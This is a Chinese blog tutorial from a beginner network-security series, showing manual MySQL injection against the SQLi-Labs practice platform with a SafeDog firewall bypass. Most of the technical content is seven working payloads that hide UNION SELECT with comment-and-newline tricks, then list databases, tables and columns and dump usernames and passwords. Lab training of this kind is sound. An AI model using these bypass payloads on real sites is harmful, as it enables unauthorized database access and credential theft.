从0到1学习网络安全 【实战篇 - MySql手工注入过狗】
2019-03-17 本文已影响38人
_07
MySql手工注入过狗
注:今后继续定期更新---“实战”!
Step1:环境搭建
这个环境是在我本机上搭的,其他环境可以去Https://www.bug1024.cn直接搞!
Step2:过狗流程
用SQLi-Labs SQL注入练习平台这个环境测试的,网站安全狗版本:
image.png
过狗Payload:
?id=-1' order-- x%0A by 3 -- +
?id=-1' UNION-- x%0ASELECT 1,2,3 -- +
?id=-1' UNION-- x%0ASELECT 1,database(-- x%0a),3-- +
?id=-1' UNION-- x%0ASELECT~ 1,schema_name,3 from information_schema.schemata limit 0,1-- +
?id=-1' UNION-- x%0ASELECT~ 1,table_name,3 from information_schema.tables where table_schema=0x7365637572697479 limit 0,1 -- +
?id=-1' UNION-- x%0ASELECT~ 1,column_name,3 from information_schema.columns where table_schema=0x7365637572697479 and-- ~%0A table_name=0x7573657273 limit 0,1 -- +
?id=-1' UNION-- x%0ASELECT~ 1,username,password from security.users limit 0,1 -- +
下面验证一下:
1、查字段数:
image.png
2、查显示位:
image.png
3、查当前数据库:
image.png
4、查其他数据库:
image.png
5、查对应数据表:
image.png
6、查对应字段名:
image.png
7、Bypass:
image.png
不知道自己安装的是不是假狗,大佬勿喷
由于小编也在学习中,写的不好请见谅。
从0到1学习网络安全 【目录】实战环境地址群内公布!!!
白帽交流群 【简介】
感谢大家支持。
